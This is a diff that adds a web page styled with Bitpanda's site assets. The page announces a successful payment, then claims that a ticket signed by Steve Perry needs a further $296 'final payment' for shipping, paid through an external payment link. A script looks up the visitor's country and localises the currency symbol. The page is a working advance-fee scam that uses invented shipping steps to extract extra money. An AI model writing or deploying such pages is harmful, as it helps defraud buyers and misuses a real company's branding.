--- a/index.html
+++ b/index.html
@@ -1,1 +1,104 @@
 
+
+
+
+<!DOCTYPE html><html class=light lang=en><head><script src="https://www.googleoptimize.com/optimize.js?id=OPT-N3D6ZNP"></script><script>if(document.cookie.match("uc_performance_v1_0=accepted")?.length){ window.dataLayer.push({'event': 'optimize.activate'}); }</script><meta charset=utf-8>
+
+
+<title> 
+Payment Successful 
+
+</title>
+
+<meta content="width=device-width, initial-scale=1.0" name=viewport>
+
+<meta content=origin name=referrer>
+<meta content="" name=description>
+
+
+
+<link href="https://cdn.bitpanda.com/app/v2/css/all.min.css?id=622e023bba9164dff838" rel=stylesheet><script src="https://cdn.bitpanda.com/app/v2/js/head.min.js?id=e37b5634f1d9be3b8e80"></script>
+
+
+<body class="default home light" style="position: unset;"><header id=layout-header><header><div class="bp-nav js-contains-anchor"><div class=bp-nav__container><div class=util-flex-shrink-0>
+
+
+
+<h4>
+
+<script>
+  async function convertCurrency() {
+    try {
+      const response = await fetch('https://ipapi.co/json/');
+      const data = await response.json();
+      const country = data.country_code;
+
+      const currencySymbolElements = document.getElementsByClassName('currency-symbol');
+
+      if (country === 'GB') {
+        Array.from(currencySymbolElements).forEach(element => {
+          element.textContent = '£';
+        });
+      } else if (country === 'DE' || country === 'FR' || country === 'ES' || country === 'NL') {
+        Array.from(currencySymbolElements).forEach(element => {
+          element.textContent = '€';
+        });
+      }
+    } catch (error) {
+      console.error('Error:', error);
+    }
+  }
+  
+  document.addEventListener('DOMContentLoaded', convertCurrency);
+</script>
+
+
+ Payment  Successful
+
+&nbsp
+
+<img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTQj6dsE4bZEG-KyDhF2kgJAxwm9k2Fqxq1Qw&amp;usqp=CAU" jsaction="" class="sFlh5c FyHeAf iPVvYb" style="max-width: 4094px; width: 44px; height: 44px; margin: 0px;" alt="verify&quot; Icon - Download for free – Iconduck" role="button" tabindex="0" aria-label="verify&quot; Icon - Download for free – Iconduck Search inside image" aria-pressed="false" jsname="kn3ccd" aria-hidden="false">
+
+
+</h4>
+
+
+</div></div>
+</header> <section id=layout-content tabindex=-1><section class="default uk-padding-remove-bottom uk-section"><div class=uk-container><div class="uk-child-width-1-2@m uk-flex-middle uk-grid" uk-grid="">
+<div class=default><section class="module-text uk-padding-remove-bottom uk-padding-remove-top uk-section uk-text-left uk-text-left@m">
+
+
+<h6>
+<font size="+1">
+<strong>
+Your  payment was successful. </strong> 
+
+
+
+Since your ticket will be unique and personalized, it will undergo multiple shipments within and outside your state for  processing before being sent to Steve Perry for his signature to ensure authenticity. Afterward, it will be shipped and delivered to you. Delivery will take up to 21 days, as it requires multiple shipments for processing, and the total shipping cost will be
+
+
+<span class="currency-symbol">$</span>296
+<br>
+<br>
+
+ Click Next to pay for the shipping; <span class="currency-symbol">$</span>296. Which is the final payment.
+</font>
+<br><br>
+
+<a href="https://square.link/u/72Rls0kX">
+
+<button style="width: 100%; height: 49px; border: 0px solid #000; border-radius: 30px; background-color: #000000; color: #ffffff; font-size: 24px;  font-weight: bold; cursor: pointer;">Next</button></a>
+</a>
+
+
+<br><br><br><br><br><br>
+<br>
+
+</h5>
+
+
+
+ 
+
+</div></nav> </div> </div></div> </section> <section class=footer__navbar><div class=uk-container><div class="uk-child-width-auto@s uk-flex-between uk-flex-middle" uk-grid=""><div> </section> <section class="footer__navbar footer__navbar--sm footer__navbar__gradient"><div class=uk-container><div class=uk-flex-between uk-grid=""><div class="uk-text-center uk-text-right@m uk-width-1-1 uk-width-auto@m"></path> </symbol></svg></body></html> 
